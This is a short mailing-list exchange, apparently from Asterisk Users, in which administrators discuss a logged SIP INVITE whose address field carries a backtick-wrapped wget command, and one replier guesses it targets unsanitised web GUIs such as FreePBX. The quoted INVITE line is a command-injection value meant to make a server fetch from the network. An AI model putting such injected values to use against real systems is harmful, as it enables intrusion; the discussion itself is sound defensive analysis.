new sort of shell attack attempt via SIP?


On 09/11/2011 07:05 PM, Tom Browning wrote: > INVITE sip:00123456789000`wgetx20-Ox20/dev/nullx20http://`@x.x.x.x
> SIP/2.0. My guess is that this attack presumes you are running a web GUI such
as FreePBX, and that it does not sanitise embedded HTML. Thus, when
reviewing your CDRs, for instance, you might click on such a link. A more sophisticated variant of that would embed

Asterisk Users 4.1 years ago 0 Answers